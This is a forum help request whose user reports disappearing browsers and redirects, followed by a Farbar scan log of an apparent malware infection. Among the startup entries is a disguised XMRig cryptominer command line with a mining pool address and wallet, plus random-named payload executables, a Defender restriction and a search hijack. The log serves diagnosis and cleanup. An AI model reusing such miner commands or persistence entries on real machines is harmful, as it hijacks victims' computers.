Infected (not sure what) - Keep having to install google/firefox


This topic is locked
8 replies to this topic

#1 Description

Posted 21 November 2017 - 03:38 AM

As stated in the title, I recently did something that made it so that when I search for Google or Firefox in my start bar, they won't show up.
If I download them again, they will leave off on the last page I was on, and I also keep getting random tabs opening and redirecting me to random sites.

Please help, please and thank you!

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 19-11-2017
Ran by Jpoch (administrator) on DESKTOP-52F4FGA (21-11-2017 00:34:37)
Running from C:\Users\Jpoch\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TempState\Downloads
Loaded Profiles: Jpoch (Available Profiles: defaultuser0 & Jpoch)
Platform: Windows 10 Home Version 1703 15063.726 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
() C:\Program Files (x86)\ASUS\AXSP\1.01.02\atkexComSvc.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvContainer\nvcontainer.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvContainer\nvcontainer.exe
(T@@9MGBSB) C:\Program Files (x86)\1cqaldhh1t4\U27HAQ26CPUNXEC.EXE
() C:\Program Files\WindowsApps\Microsoft.SkypeApp_12.8.487.0_x64__kzf8qxf38zg5c\SkypeHost.exe
(hxxp://tortoisesvn.net) C:\Program Files\TortoiseSVN\bin\TSVNCache.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.7\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.7\GoogleCrashHandler64.exe
(Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
(LZDZ3UY) C:\Program Files\U9K03QV4LJ\U9K03QV4L.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MSASCuiL.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Pixart Imaging Inc) C:\Windows\System32\TiltWheelMouse.exe
(Spotify Ltd) C:\Users\Jpoch\AppData\Roaming\Spotify\SpotifyWebHelper.exe
(Piriform Ltd) C:\Program Files\CCleaner\CCleaner64.exe
(Spotify Ltd) C:\Users\Jpoch\AppData\Roaming\Spotify\SpotifyWebHelper.exe
(T@@9MGBSB) C:\Program Files\8OK3IXWMOC\8OK3IXWMO.exe
( ) C:\Users\Jpoch\AppData\Roaming\vnp350ll0wy\TGVYNP5FI0Z.EXE
() C:\Users\Jpoch\AppData\Local\Temp\is-4A2QI.tmp\TGVYNP5FI0Z.tmp
(1) C:\Program Files\P4B69KW31G\P4B69KW31.exe
(T@@9MGBSB) C:\Program Files\9F8KN5EJ25\M4EZV4LK1.exe
(T@@9MGBSB) C:\Program Files (x86)\1cqaldhh1t4\24P9P.exe
(T@@9MGBSB) C:\Program Files\LVN8W6E40P\LVN8W6E40.exe
(LZDZ3UY) C:\Program Files\U9K03QV4LJ\U9K03QV4L.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\ShadowPlay\nvsphelper64.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe
(Team RuneMate) C:\Program Files (x86)\RuneMate\RuneMate.exe
() C:\Users\Jpoch\jagexcache\jagexlauncher\bin\JagexLauncher.exe
(Microsoft Corporation) C:\Windows\System32\GameBarPresenceWriter.exe
(Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
 
==================== Registry (Whitelisted) ===========================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [SecurityHealth] => C:\Program Files\Windows Defender\MSASCuiL.exe [629152 2017-03-18] (Microsoft Corporation)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [8725248 1999-12-31] (Realtek Semiconductor)
HKLM\...\Run: [MouseDriver] => C:\Windows\system32\TiltWheelMouse.exe [241152 2012-12-19] (Pixart Imaging Inc)
HKLM\...\Run: [WindowsDefender] => C:\Program Files\Windows Defender\MSASCuiL.exe [629152 2017-03-18] (Microsoft Corporation)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [587288 2017-09-05] (Oracle Corporation)
HKLM-x32\...\Run: [BOOSTER] => "C:\Users\Jpoch\AppData\Local\PCBooster\booster.exe" -o 188.42.242.221:3333 -u 49YfoE2xWHG1vywX2xTV8XZzBzB1E2QHEF9GtzPKSPRdK5TEkxXGRxVdAq8LwbA2Pz7jNQ9gYBxeFPHcqiiqaGJM2QyW64C -p WORKER-64-1411 -k -o p (the data entry has 200 more characters).
HKLM-x32\...\Run: [OPTIMIZER.EXE] => C:\Users\Jpoch\AppData\Local\Optimizer\Optimizer.exe [5691392 2017-11-20] (www.xmrig.com)
HKLM\...\RunOnce: [OMEWPRODUCT_A4ZTJ] => C:\Program Files (x86)\1cqaldhh1t4\U27HAQ26CPUNXEC.EXE [422400 2017-11-20] (T@@9MGBSB) <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [9532120 2017-04-10] (Piriform Ltd)
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [3102496 2017-10-30] (Valve Corporation)
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\...\Run: [Spotify] => C:\Users\Jpoch\AppData\Roaming\Spotify\Spotify.exe [21025392 2017-11-13] (Spotify Ltd)
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\...\Run: [1GTGLIO7OYX9UG4] => C:\Program Files\8OK3IXWMOC\8OK3IXWMO.exe [1037312 2017-11-20] (T@@9MGBSB)
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\...\Run: [7571555] => C:\Users\Jpoch\AppData\Roaming\vnp350ll0wy\tgvynp5fi0z.exe [529932 2017-11-20] ( )
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\...\Run: [8AXDS40R0VLOMTA] => C:\Program Files\P4B69KW31G\P4B69KW31.exe [840192 2017-11-20] (1)
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\...\Run: [ADVOFKIWWU.EXE] => C:\Users\Jpoch\AppData\Local\Temp\dd-37146-936-f9988-201d17ce4a2e4\ADVOFKIWWU.exe m_1 L_1 <==== ATTENTION
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\...\Run: [LJ3X92T3371CP84] => C:\Program Files\9F8KN5EJ25\M4EZV4LK1.exe [1037312 2017-11-20] (T@@9MGBSB)
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\...\Run: [O6FW1NSS4KFJQRH] => C:\Program Files (x86)\1cqaldhh1t4\24P9P.exe [1037312 2017-11-20] (T@@9MGBSB)
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\...\Run: [Y680XDWS6L0I742] => C:\Program Files\LVN8W6E40P\LVN8W6E40.exe [1037312 2017-11-20] (T@@9MGBSB)
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\...\Run: [CVAWYW1XG38Q8N7] => C:\Program Files\U9K03QV4LJ\U9K03QV4L.exe [669696 2017-11-21] (LZDZ3UY)
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\...\Run: [Spotify Web Helper] => C:\Users\Jpoch\AppData\Roaming\Spotify\SpotifyWebHelper.exe [777840 2017-11-13] (Spotify Ltd)
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\...\MountPoints2: {514308f6-a4ca-11e6-ac7b-806e6f6e6963} - "E:\setup.exe" 
Startup: C:\Users\Jpoch\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Twitch.lnk [2017-06-21]
ShortcutTarget: Twitch.lnk -> C:\Users\Jpoch\AppData\Roaming\Twitch\Bin\Twitch.exe (Twitch Interactive, Inc.)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 75.75.75.75 75.75.76.76
Tcpip\..\Interfaces\{57b6c9be-c784-47bf-ab26-3f1457b2998a}: [DhcpNameServer] 75.75.75.75 75.75.76.76
 
Internet Explorer:
==================
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_151\bin\ssv.dll [2017-11-19] (Oracle Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_151\bin\jp2ssv.dll [2017-11-19] (Oracle Corporation)
 
FireFox:
========
FF DefaultProfile: eggor1db.default
FF ProfilePath: C:\Users\Jpoch\AppData\Roaming\Mozilla\Firefox\Profiles\eggor1db.default [2017-11-21]
FF Extension: (uBlock Origin) - C:\Users\Jpoch\AppData\Roaming\Mozilla\Firefox\Profiles\eggor1db.default\Extensions\uBlock0@raymondhill.net.xpi [2017-11-20]
FF Extension: (Adblock Plus) - C:\Users\Jpoch\AppData\Roaming\Mozilla\Firefox\Profiles\eggor1db.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2017-11-08]
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_27_0_0_187.dll [2017-11-14] ()
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_27_0_0_187.dll [2017-11-14] ()
FF Plugin-x32: @java.com/DTPlugin,version=11.151.2 -> C:\Program Files (x86)\Java\jre1.8.0_151\bin\dtplugin\npDeployJava1.dll [2017-11-19] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin -> C:\Program Files (x86)\Java\jre1.8.0_151\bin\plugin2\npjp2.dll [2017-11-19] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.151.2 -> C:\Program Files (x86)\Java\jre1.8.0_151\bin\plugin2\npjp2.dll [2017-11-19] (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.20513.0\npctrl.dll [2013-05-13] ( Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2017-10-27] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2017-10-27] (NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.7\npGoogleUpdate3.dll [2017-11-13] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.7\npGoogleUpdate3.dll [2017-11-13] (Google Inc.)
 
Chrome: 
=======
CHR DefaultProfile: Profile 1
CHR DefaultSearchURL: Profile 1 -> hxxp://srch.bar/{searchTerms}
CHR DefaultSuggestURL: Profile 1 -> hxxp://srch.bar/?s={searchTerms}
CHR Profile: C:\Users\Jpoch\AppData\Local\Google\Chrome\User Data\Default [2017-11-20]
CHR Extension: (Quick Searcher v16.2) - C:\Users\Jpoch\AppData\Local\Google\Chrome\User Data\Default\Extensions\pbdpajcdgknpendpmecafmopknefafha [2017-11-20]
CHR Profile: C:\Users\Jpoch\AppData\Local\Google\Chrome\User Data\Profile 1 [2017-11-21]
CHR Extension: (Slides) - C:\Users\Jpoch\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-10-16]
CHR Extension: (Docs) - C:\Users\Jpoch\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aohghmighlieiainnegkcijnfilokake [2017-10-16]
CHR Extension: (Google Drive) - C:\Users\Jpoch\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\apdfllckaahabafndbhieahigkjlhalf [2017-04-05]
CHR Extension: (YouTube) - C:\Users\Jpoch\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-04-05]
CHR Extension: (Chrome Cleaner Pro) - C:\Users\Jpoch\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ccjleegmemocfpghkhpjmiccjcacackp [2017-10-11]
CHR Extension: (uBlock Origin) - C:\Users\Jpoch\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\cjpalhdlnbpafiamejdnhcphjbkeiagm [2017-11-12]
CHR Extension: (Sheets) - C:\Users\Jpoch\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2017-10-16]
CHR Extension: (Google Docs Offline) - C:\Users\Jpoch\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2017-04-06]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Jpoch\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-08-21]
CHR Extension: (Gmail) - C:\Users\Jpoch\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-04-05]
CHR Extension: (Chrome Media Router) - C:\Users\Jpoch\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-11-16]
CHR Profile: C:\Users\Jpoch\AppData\Local\Google\Chrome\User Data\System Profile [2017-11-19]
CHR Extension: (Quick Searcher) - C:\Users\Jpoch\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\pbdpajcdgknpendpmecafmopknefafha [2017-11-20]
CHR HKLM\...\Chrome\Extension: [PILPLLOABDEDFMIALNFCHJOMJMPJCOEJ] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-3446151218-491997262-3667861278-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [PILPLLOABDEDFMIALNFCHJOMJMPJCOEJ] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [ccjleegmemocfpghkhpjmiccjcacackp] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [PILPLLOABDEDFMIALNFCHJOMJMPJCOEJ] - hxxps://clients2.google.com/service/update2/crx
 
==================== Services (Whitelisted) ====================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 asComSvc; C:\Program Files (x86)\ASUS\AXSP\1.01.02\atkexComSvc.exe [936728 2015-09-28] ()
S3 npggsvc; C:\WINDOWS\SysWOW64\GameMon.des [7770888 2017-05-09] (INCA Internet Co., Ltd.)
R2 NvContainerLocalSystem; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [518080 2017-10-10] (NVIDIA Corporation)
S3 NvContainerNetworkService; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [518080 2017-10-10] (NVIDIA Corporation)
R2 NVDisplay.ContainerLocalSystem; C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe [462968 2017-10-27] (NVIDIA Corporation)
R2 NvTelemetryContainer; C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe [460736 2017-10-10] (NVIDIA Corporation)
S3 VSStandardCollectorService140; C:\Program Files (x86)\Microsoft Visual Studio 14.0\Team Tools\DiagnosticsHub\Collector\StandardCollector.Service.exe [108776 2016-09-06] (Microsoft Corporation)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [342264 2017-03-18] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [102816 2017-06-19] (Microsoft Corporation)
 
===================== Drivers (Whitelisted) ======================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R1 AsIO; C:\Windows\SysWow64\drivers\AsIO.sys [15232 2015-09-28] ()
S3 dg_ssudbus; C:\WINDOWS\System32\drivers\ssudbus.sys [129152 2016-04-24] (Samsung Electronics Co., Ltd.)
S3 FlashUSB; C:\WINDOWS\System32\drivers\FlashUSB.sys [19968 2013-05-01] (Intel Mobile Communications)
R3 MEIx64; C:\WINDOWS\system32\DRIVERS\TeeDriverx64.sys [129312 2014-09-30] (Intel Corporation)
S3 mt7612US; C:\WINDOWS\System32\drivers\mt7612US.sys [377864 2015-12-09] (MediaTek Inc.)
R3 nvlddmkm; C:\WINDOWS\System32\DriverStore\FileRepository\nv_ref_pubwu.inf_amd64_2e7fa54192fe16d0\nvlddmkm.sys [16936048 2017-11-09] (NVIDIA Corporation)
S3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [30144 2017-10-10] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\WINDOWS\system32\drivers\nvvad64v.sys [50624 2017-10-10] (NVIDIA Corporation)
R3 nvvhci; C:\WINDOWS\System32\drivers\nvvhci.sys [57792 2017-10-12] (NVIDIA Corporation)
R3 rt640x64; C:\WINDOWS\System32\drivers\rt640x64.sys [888064 1999-12-31] (Realtek )
S3 rzbtendpt; C:\WINDOWS\System32\drivers\rzbtendpt.sys [51736 2016-06-23] (Razer Inc)
S3 rzdaendpt; C:\WINDOWS\System32\drivers\rzdaendpt.sys [42008 2016-06-23] (Razer Inc)
R3 rzendpt; C:\WINDOWS\System32\drivers\rzendpt.sys [51736 2016-06-23] (Razer Inc)
S3 rzhnet; C:\WINDOWS\System32\Drivers\rzhnet.sys [29720 2016-06-23] (Razer Inc)
S3 rzjstk; C:\WINDOWS\System32\drivers\rzjstk.sys [36368 2016-06-23] (Razer Inc)
S3 rzkeypadendpt; C:\WINDOWS\System32\drivers\rzkeypadendpt.sys [45080 2016-06-23] (Razer Inc)
S3 rzmpos; C:\WINDOWS\System32\drivers\rzmpos.sys [47640 2016-06-23] (Razer Inc)
S3 rzp1endpt; C:\WINDOWS\System32\drivers\rzp1endpt.sys [51736 2016-06-23] (Razer Inc)
S3 rzvkeyboard; C:\WINDOWS\System32\drivers\rzvkeyboard.sys [43544 2016-06-23] (Razer Inc)
S3 rzvmouse; C:\WINDOWS\System32\drivers\rzvmouse.sys [43544 2016-06-23] (Razer Inc)
S3 SDFRd; C:\WINDOWS\System32\drivers\SDFRd.sys [31128 2017-03-18] ()
R3 SensorsSimulatorDriver; C:\WINDOWS\System32\drivers\WUDFRd.sys [220672 2017-03-18] (Microsoft Corporation)
S3 shspusb; C:\WINDOWS\System32\drivers\HSPUSB.sys [24064 2013-05-01] (MobileTop)
S3 sscdserd; C:\WINDOWS\System32\drivers\sscdserd.sys [158024 2013-05-01] (MCCI Corporation)
S3 ssceserd; C:\WINDOWS\System32\drivers\ssceserd.sys [158024 2013-05-01] (MCCI Corporation)
S3 ssdudfu; C:\WINDOWS\System32\drivers\ssdudfu.sys [101960 2013-05-01] (MCCI)
S3 ssm_bus; C:\WINDOWS\System32\drivers\ssm_bus.sys [136192 2013-05-01] (MCCI Corporation)
S3 ssm_mdm; C:\WINDOWS\System32\drivers\ssm_mdm.sys [172032 2013-05-01] (MCCI Corporation)
S3 ssuddmgr; C:\WINDOWS\System32\drivers\ssuddmgr.sys [203672 2013-05-01] (DEVGURU Co., LTD.(www.devguru.co.kr))
S3 ssudobex; C:\WINDOWS\System32\drivers\ssudobex.sys [203672 2013-05-01] (DEVGURU Co., LTD.(www.devguru.co.kr))
S3 ssudqcfilter; C:\WINDOWS\System32\drivers\ssudqcfilter.sys [64640 2016-04-24] (QUALCOMM Incorporated)
S3 ssudrmnet; C:\WINDOWS\System32\drivers\ssudrmnet.sys [67864 2013-05-01] (DEVGURU Co., LTD.)
S3 ssudserd; C:\WINDOWS\System32\drivers\ssudserd.sys [203672 2013-05-01] (DEVGURU Co., LTD.(www.devguru.co.kr))
S3 ss_bserd; C:\WINDOWS\System32\drivers\ss_bserd.sys [128000 2013-05-01] (MCCI Corporation)
U3 TrueSight; C:\Windows\System32\drivers\TrueSight.sys [28272 2017-11-20] ()
S3 t_mouse.sys; C:\WINDOWS\System32\drivers\t_mouse.sys [6144 2012-12-19] ()
S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [44632 2017-03-18] (Microsoft Corporation)
S3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [294816 2017-03-18] (Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [121248 2017-03-18] (Microsoft Corporation)
R1 ZAM_Guard; C:\WINDOWS\System32\drivers\zamguard64.sys [203680 2017-05-29] (Zemana Ltd.)
S1 ZAM; \??\C:\WINDOWS\System32\drivers\zam64.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2017-11-21 00:22 - 2017-11-21 00:22 - 000000000 __HDC C:\OneDriveTemp
2017-11-21 00:22 - 2017-11-21 00:22 - 000000000 ____D C:\Program Files\U9K03QV4LJ
2017-11-20 23:50 - 2017-11-20 23:50 - 001652384 ____C ( ) C:\Users\Jpoch\Downloads\INSTALLER.EXE
2017-11-20 23:50 - 2017-11-20 23:50 - 001652384 ____C ( ) C:\Users\Jpoch\Downloads\INSTALLER (1).EXE
2017-11-20 23:50 - 2017-11-20 23:50 - 000570836 ____C C:\Users\Jpoch\Downloads\VMWAREWORKSTATIONFULL14_0_06661328.ZIP
2017-11-20 23:50 - 2017-11-20 23:50 - 000016904 _____ C:\WINDOWS\System32\Tasks\Yaminguict Explorer for ERC
2017-11-20 23:50 - 2017-11-20 23:50 - 000000000 ____D C:\Users\Jpoch\AppData\Local\Optimizer
2017-11-20 23:50 - 2017-11-20 23:50 - 000000000 ____D C:\Users\Jpoch\AppData\Local\afeada034889495fb73c9f8c3f354641
2017-11-20 23:50 - 2017-11-20 23:50 - 000000000 ____D C:\Users\Jpoch\AppData\Local\9473901e0c7844098f532bfef236bee4
2017-11-20 23:50 - 2017-11-20 23:50 - 000000000 ____D C:\Program Files\P4B69KW31G
2017-11-20 23:50 - 2017-11-20 23:50 - 000000000 ____D C:\Program Files\LVN8W6E40P
2017-11-20 23:50 - 2017-11-20 23:50 - 000000000 ____D C:\Program Files\9F8KN5EJ25
2017-11-20 23:50 - 2017-11-20 23:50 - 000000000 ____D C:\Program Files\8OK3IXWMOC
2017-11-20 23:50 - 2017-11-20 23:50 - 000000000 ____D C:\Program Files (x86)\1cqaldhh1t4
2017-11-20 21:08 - 2017-11-20 23:51 - 000028272 _____ C:\WINDOWS\system32\Drivers\TrueSight.sys
2017-11-20 21:08 - 2017-11-20 21:08 - 036141704 ____C (Adlice Software ) C:\Users\Jpoch\Downloads\RogueKiller_setup_ref3.exe
2017-11-20 21:08 - 2017-11-20 21:08 - 000000899 ____C C:\Users\Public\Desktop\RogueKiller.lnk
2017-11-20 21:08 - 2017-11-20 21:08 - 000000000 ____D C:\ProgramData\RogueKiller
2017-11-20 21:08 - 2017-11-20 21:08 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\RogueKiller
2017-11-20 21:08 - 2017-11-20 21:08 - 000000000 ____D C:\Program Files\RogueKiller
2017-11-20 20:59 - 2017-11-20 20:59 - 008261584 ____C (Malwarebytes) C:\Users\Jpoch\Downloads\AdwCleaner.exe
2017-11-20 20:58 - 2017-11-20 20:58 - 001790024 ____C (Malwarebytes) C:\Users\Jpoch\Downloads\JRT.exe
2017-11-20 20:52 - 2017-11-20 20:52 - 000054142 ____C C:\Users\Jpoch\Downloads\Shortcut.txt
2017-11-20 20:50 - 2017-11-21 00:34 - 000000000 ___DC C:\FRST
2017-11-20 20:48 - 2017-11-20 20:49 - 343075440 ____C C:\Users\Jpoch\Downloads\EmsisoftEmergencyKit.exe
2017-11-20 20:46 - 2017-11-20 20:46 - 001792640 ____C (Bleeping Computer, LLC) C:\Users\Jpoch\Downloads\rkill (1).exe
2017-11-20 20:45 - 2017-11-20 20:45 - 005659763 ____C (Swearware) C:\Users\Jpoch\Downloads\ComboFix (1).exe
2017-11-19 14:17 - 2017-11-19 14:17 - 000311176 ____C (Mozilla) C:\Users\Jpoch\Downloads\Firefox Installer.exe
2017-11-19 05:04 - 2017-11-19 05:04 - 000097856 _____ (Oracle Corporation) C:\WINDOWS\SysWOW64\WindowsAccessBridge-32.dll
2017-11-19 05:04 - 2017-11-19 05:04 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2017-11-19 05:03 - 2017-11-19 05:03 - 001852992 ____C (Oracle Corporation) C:\Users\Jpoch\Downloads\JavaSetup8u151.exe
2017-11-19 05:03 - 2017-11-19 05:03 - 000000000 ___DC C:\Users\Jpoch\AppData\LocalLow\Oracle
2017-11-19 05:01 - 2017-11-19 05:04 - 000270912 _____ (Oracle Corporation) C:\WINDOWS\SysWOW64\javaws.exe
2017-11-19 05:01 - 2017-11-19 05:04 - 000000000 ____D C:\Program Files (x86)\Java
2017-11-19 05:01 - 2017-11-19 05:01 - 000000000 ___DC C:\Users\Jpoch\OneDrive\Documents\EpicBot
2017-11-19 05:01 - 2017-11-19 05:01 - 000000000 ____D C:\Users\Jpoch\AppData\Local\{2C8B1AD7-0823-766F-65BB-538741D3AF1F}
2017-11-19 05:01 - 2017-11-19 05:01 - 000000000 ____D C:\ProgramData\Sun
2017-11-19 03:16 - 2017-11-19 03:17 - 485401816 ____C (VMware, Inc.) C:\Users\Jpoch\Downloads\VMware-workstation-full-14.0.0-6661328.exe
2017-11-19 03:05 - 2017-11-20 21:04 - 000000675 ____C C:\Users\Jpoch\Desktop\JRT.txt
2017-11-19 03:02 - 2017-11-20 20:47 - 000003082 ____C C:\Users\Jpoch\Desktop\Rkill.txt
2017-11-19 03:02 - 2017-11-19 03:02 - 005659763 ____C (Swearware) C:\Users\Jpoch\Downloads\ComboFix.exe
2017-11-19 03:02 - 2017-11-19 03:02 - 001792640 ____C (Bleeping Computer, LLC) C:\Users\Jpoch\Downloads\rkill.exe
2017-11-19 02:54 - 2017-11-20 21:03 - 000000000 ___DC C:\AdwCleaner
2017-11-19 02:50 - 2017-11-20 23:50 - 000000000 ____D C:\Users\Jpoch\AppData\Roaming\vnp350ll0wy
2017-11-19 02:35 - 2017-11-19 05:09 - 000000045 _____ C:\Users\Jpoch\jagex_cl_runescape_LIVE1.dat
2017-11-19 02:35 - 2017-11-19 02:35 - 000000000 ____D C:\Users\Jpoch\jagexcache1
2017-11-19 01:36 - 2017-05-09 17:17 - 007770888 _____ (INCA Internet Co., Ltd.) C:\WINDOWS\SysWOW64\GameMon.des
2017-11-19 01:35 - 2017-11-19 01:35 - 000000000 ____D C:\Program Files\Common Files\INCA Shared
2017-11-19 01:28 - 2017-11-20 21:31 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MU LEGEND GLOBAL
